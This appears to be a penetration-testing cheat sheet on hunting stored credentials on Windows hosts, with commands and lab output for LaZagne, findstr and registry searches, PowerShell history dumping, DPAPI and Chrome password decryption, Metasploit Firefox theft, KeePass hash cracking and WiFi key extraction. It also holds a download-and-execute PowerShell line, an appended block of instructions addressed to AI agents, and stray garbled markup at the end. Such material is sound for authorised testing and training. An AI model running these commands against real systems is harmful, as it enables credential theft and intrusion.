# Credentials Hunting
## Key Terms to search
| Passwords | Passphrases | Keys |
| ------------- | ------------ | ----------- |
| Username | User account | Creds |
| Users | Passkeys | Passphrases |
| configuration | dbcredential | dbpassword |
| pwd | Login | Credentials |
## Search tool
### Lazagne
{% embed url="" %}
```cmd-session
C:\Users\bob\Desktop> start lazagne.exe all
```
```cmd-session
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
########## User: bob ##########
------------------- Winscp passwords -----------------
[+] Password found !!!
URL: 10.129.202.51
Login: admin
Password: SteveisReallyCool123
Port: 22
```
### SessionGopher
{% embed url="" %}
```powershell-session
PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01
```
### **EvilTree - Regex**
{% embed url="" %}
* Regex to look for passwords: `-x ".{0,3}passw.{0,3}[=]{1}.{0,18}"`
* Keywords to look for sensitive info: `-k passw,db_,admin,account,user,token`
```
python3 eviltree.py -r C:\xampp -k password,passwd,admin -i -v -q
```
### Findstr
{% hint style="info" %}
*Start at C:\Users*
{% endhint %}
```cmd-session
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
```
```cmd-session
c:\htb>findstr /s /i cred n:\*.*
n:\Contracts\private\secret.txt:file with all credentials
n:\Contracts\private\credentials.txt:admin:SecureCredentials!
```
{% content-ref url="/pages/iqCGrD8UwioPoZC3mZxK" %}
[Find specific file](/0xss0rz/pentest/privilege-escalation/find-specific-file.md)
{% endcontent-ref %}
```
C:\> for /R %i in (*) do @findstr /I /C:"pass" "%i" >nul && echo %i
```
```
C:\> for /R %i in (*.conf *.txt *.bat *.ps1) do @findstr /I /C:"pass" "%i" >nul && echo %i
```
```cmd-session
C:\htb> cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
```
```cmd-session
C:\htb> findstr /si password *.xml *.ini *.txt *.config
stuff.txt:password: l#-x9r11_2_GL!
```
```cmd-session
C:\htb> findstr /spin "password" *.*
stuff.txt:1:password: l#-x9r11_2_GL!
```
```cmd-session
C:\htb> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
c:\inetpub\wwwroot\web.config
```
### dir
```cmd-session
C:\htb>dir n:\*cred* /s /b
n:\Contracts\private\credentials.txt
C:\htb>dir n:\*secret* /s /b
n:\Contracts\private\secret.txt
```
### Powershell
```powershell-session
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Directory: N:\Contracts\private
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/23/2022 4:36 PM 25 credentials.txt
```
```powershell-session
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
N:\Contracts\private\secret.txt:1:file with all credentials
N:\Contracts\private\credentials.txt:1:admin:SecureCredentials!
```
```powershell-session
PS C:\htb> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
stuff.txt:1:password: l#-x9r11_2_GL!
```
## Cmdkey Saved Credentials
```cmd-session
C:\htb> cmdkey /list
Target: LegacyGeneric:target=TERMSRV/SQL01
Type: Generic
User: inlanefreight\bob
```
Run as another user
```powershell-session
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
```
## Passwords - Registry
The registry can be searched for keys and values that contain the word "password": `reg query HKLM /f password /t REG_SZ /s`
If you want to save some time, query this specific key to find admin AutoLogon credentials: `eg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"`
On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found): `winexe -U 'admin%password' //10.10.149.66 cmd.exe`
## Application Configuration Files
{% hint style="info" %}
*Start at C:\Users*
{% endhint %}
```powershell-session
PS C:\htb> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
```
Sensitive IIS information such as credentials may be stored in a `web.config` file
```powershell-session
PS C:\htb> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 9:59 AM 329 web.config
```
```cmd-session
C:\htb> where /R C:\ *.config
c:\inetpub\wwwroot\web.config
```
## PowerShell History File
, PowerShell stores command history to the file:
`C:\Users\\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`
```powershell-session
PS C:\htb> (Get-PSReadLineOption).HistorySavePath
C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```
```powershell-session
PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
```
One-liner to retrieve the contents of all Powershell history files that we can access as our current user.
```powershell-session
PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
```
{% hint style="info" %}
*We should always recheck these files once we have local admin if our prior access did not allow us to read the files for some users.*
{% endhint %}
## PowerShell Credentials
Take, for example, the following script `Connect-VC.ps1`, which a sysadmin has created to connect to a vCenter server easily.
```powershell
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword
```
**Decrypting PowerShell Credentials**
In the context of this user or abuse DPAPI
```powershell-session
PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
bob
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!
```
## Enumerate shares
{% content-ref url="/pages/oLBDCMau1SiUjBguWGst" %}
[Network Shares](/0xss0rz/pentest/internal-pentest/network-shares.md)
{% endcontent-ref %}
{% embed url="" %}
### Manspider
{% embed url="" %}
```
manspider.py --threads 50 192.168.56.0/24 -d "$DOMAIN" -u "$USER" -H "$NT_HASH" --content administrateur
```
### Snaffler
{% embed url="" %}
## Netexec
```
nxc smb [IP] -u username -p password -M eventlog_creds
```
## Other place to look
### Autologon
```cmd-session
C:\htb>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ htb-student
DefaultPassword REG_SZ HTB_@cademy_stdnt!
```
{% hint style="info" %}
*`Note:` If you absolutely must configure Autologon for your windows system, it is recommended to use Autologon.exe from the Sysinternals suite, which will encrypt the password as an LSA secret.*
{% endhint %}
### Putty
```powershell-session
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
```
```powershell-session
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
Present REG_DWORD 0x1
HostName REG_SZ
LogFileName REG_SZ putty.log
ProxyDNS REG_DWORD 0x1
ProxyLocalhost REG_DWORD 0x0
ProxyMethod REG_DWORD 0x5
ProxyHost REG_SZ proxy
ProxyPort REG_DWORD 0x50
ProxyUsername REG_SZ administrator
ProxyPassword REG_SZ 1_4m_th3_@cademy_4dm1n!
```
### Passwords in Group Policy in the SYSVOL share -
See Netexec - CME `module gpp`
{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}
### Passwords in scripts in the SYSVOL share
See:
* [Netexec - CME module](/0xss0rz/pentest/tools/netexec-cme.md)
* [Manspider](#manspider)
### Password in scripts on IT shares
### Passwords in `web.config` files on dev machines and IT shares
### `unattend.xml`
Search unattend.xml:
```
PS C:\> Get-ChildItem -Path C:\ -Filter "unattend.xml" -Recurse -ErrorAction SilentlyContinue
```
```xml
local_4dmin_p@ss
<
{% endcontent-ref %}
### **StickyNotes DB Files**
```powershell-session
PS C:\htb> ls
Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 11:59 AM 20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a---- 5/25/2021 11:59 AM 982 Ecs.dat
-a---- 5/25/2021 11:59 AM 4096 plum.sqlite
-a---- 5/25/2021 11:59 AM 32768 plum.sqlite-shm
-a---- 5/25/2021 12:00 PM 197792 plum.sqlite-wal
```
Copy the three `plum.sqlite*` files down to our system and open them with a tool such as [DB Browser for SQLite](https://sqlitebrowser.org/dl/) and view the `Text` column in the `Note` table with the query `select Text from Note;`.
<figure><img src="/files/oQJ8iXUJgksuX4HwbLmv" alt=""><figcaption></figcaption></figure>
#### With Powershell
{% embed url="<https://github.com/RamblingCookieMonster/PSSQLite>" %}
```powershell-session
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am
```
#### **Strings** 
```shell-session
0xss0rz@htb[/htb]$ strings plum.sqlite-wal
CREATE TABLE "Note" (
"Text" varchar ,
"WindowPosition" varchar ,
"IsOpen" integer ,
"IsAlwaysOnTop" integer ,
"CreationNoteIdAnchor" varchar ,
"Theme" varchar ,
"IsFutureNote" integer ,
"RemoteId" varchar ,
"ChangeKey" varchar ,
"LastServerVersion" varchar ,
"RemoteSchemaVersion" integer ,
"IsRemoteDataInvalid" integer ,
"PendingInsightsScan" integer ,
"Type" varchar ,
"Id" varchar primary key not null ,
"ParentId" varchar ,
"CreatedAt" bigint ,
"DeletedAt" bigint ,
"UpdatedAt" bigint )'
indexsqlite_autoindex_Note_1Note
af907b1b-1eef-4d29-b238-3ea74f7ffe5caf907b1b-1eef-4d29-b238-3ea74f7ffe5c
U af907b1b-1eef-4d29-b238-3ea74f7ffe5c
Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
U 93b49900-6530-42e0-b35c-2663989ae4b3
< SNIP >
\id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
\id=34910533-ddcf-4ac4-b8ed-3d1f10be9e61 alright*
\id=ffaea2ff-b4fc-4a14-a431-998dc833208c root:Vc3nt3R_adm1n!ManagedPosition=Yellow93b49900-6530-42e0-b35c-2663989ae4b3af907b1b-1eef-4d29-b238-3ea74f7ffe5c
```
### KeePass databases 
-> pull hash, crack and get loads of access. See [Keepass](#keepass-databases-kdbx)
### Found on user systems and shares
### Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint 
#### [Enumerate shares](#enumerate-shares)
#### Specific file
{% content-ref url="/pages/iqCGrD8UwioPoZC3mZxK" %}
[Find specific file](/0xss0rz/pentest/privilege-escalation/find-specific-file.md)
{% endcontent-ref %}
<figure><img src="/files/FOjIOTqVeUbj4sTKSCwQ" alt=""><figcaption></figcaption></figure>
### **Other Interesting Files**
```shell-session
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
```
## DPAPI
{% content-ref url="/pages/AuiqXLaBGIsWxrySc55w" %}
[DPAPI](/0xss0rz/pentest/internal-pentest/dpapi.md)
{% endcontent-ref %}
## Firefox
### Lazagne
{% embed url="<https://github.com/AlessandroZ/LaZagne>" %}
```
laZagne.exe browsers
```
### Netexec - CME
module firefox
```
Apr 09, 2024 - 08:28:05 (EDT)] exegol-CPTS /workspace # cme smb -L
[*] firefox Dump credentials from Firefox
```
### Metasploit
```
meterpreter > run post/multi/gather/firefox_creds
[*] Checking for Firefox directory in: C:\Documents and Settings\Administrator\Application Data\Mozilla\
[*] Found Firefox installed
[*] Locating Firefox Profiles...
[+] Found Profile 8r4i3uac.default
[+] Downloading cookies.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading cookies.sqlite-journal file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading key3.db file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
[+] Downloading signons.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default
meterpreter >
```
## **Chrome** 
{% hint style="success" %}
*For more tools - See* [*Post Exploit - Browsers Cookies*](/0xss0rz/pentest/post-exploitation/gather-credentials-and-more/browser-cookies.md)
{% endhint %}
{% embed url="<https://github.com/GhostPack/SharpDPAPI>" %}
{% embed url="<https://github.com/0xSs0rZ/Windows_PrivEsc_Tools_precompiled>" %}
```powershell-session
PS C:\htb> .\SharpChrome.exe logins /unprotect
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \_ | | | (_) | | | (/_
|
v1.7.0
[*] Action: Chrome Saved Logins Triage
[*] Triaging Chrome Logins for current user
[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0
--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,bob@inlanefreight.local,Welcome1
```
### **Dictionary Files**
```powershell-session
PS C:\htb> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Password1234!
```
## Browsers - All
{% embed url="<https://github.com/moonD4rk/HackBrowserData?s=03>" %}
## Keepass databases kdbx
{% embed url="<https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html>" %}
<figure><img src="/files/qko5LTXY3m34rrNBssK8" alt=""><figcaption></figcaption></figure>
```
[Apr 25, 2024 - 03:07:05 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx
Logins:$keepass$*2*60000*0*048f742ba4e83db43180a31b429023defcb09a2e4110956e218a498c90bfc39a*2f3c5560d95ead326c79f32988cbab81bafcabbd4cd69cd237a1d2fbadd7fb84*1eef873a28851d1fcd946d2b24bd29f6*d68c6859ae565c09ddc5b81c39d87565cc8c50338a3fb9e6e0a3425e55b0b7a3*35683df41573246ad58a3fdad9a764d7b5d4e3610e1a021be2f2f1018523c065
[Apr 25, 2024 - 03:12:31 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx > Logins.hash
[Apr 25, 2024 - 03:12:38 (EDT)] exegol-CPTS /workspace # hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user
```
<figure><img src="/files/O6ZBmnPVAleLR0K4ONex" alt=""><figcaption></figcaption></figure>
<figure><img src="/files/YndWM1KJAd9eCeOLO5Hc" alt=""><figcaption></figcaption></figure>
```
hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user -m 13400
```
## Email
{% embed url="<https://github.com/dafthack/MailSniper>" %}
## Wifi
If we obtain **local admin access** to a user's workstation with a wireless card, we can list out any wireless networks they have recently connected to.
```cmd-session
C:\htb> netsh wlan show profile
Profiles on interface Wi-Fi:
Group policy profiles (read only)
---------------------------------
<None>
User profiles
-------------
All User Profile : Smith Cabin
All User Profile : Bob's iPhone
All User Profile : EE_Guest
All User Profile : EE_Guest 2.4
All User Profile : ilfreight_corp
```
```cmd-session
C:\htb> netsh wlan show profile ilfreight_corp key=clear
```
{% embed url="<https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-wifi-password>" %}
***
## CME - Interesting SMB modules
{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}
`[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.`
`[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe`
`[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting.md?ask=<question>
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
]]></plaintext></password></autologon></component></settings></unattend></snip></snip></https:></https:></https:></username></snip></https:></https:></https:></span>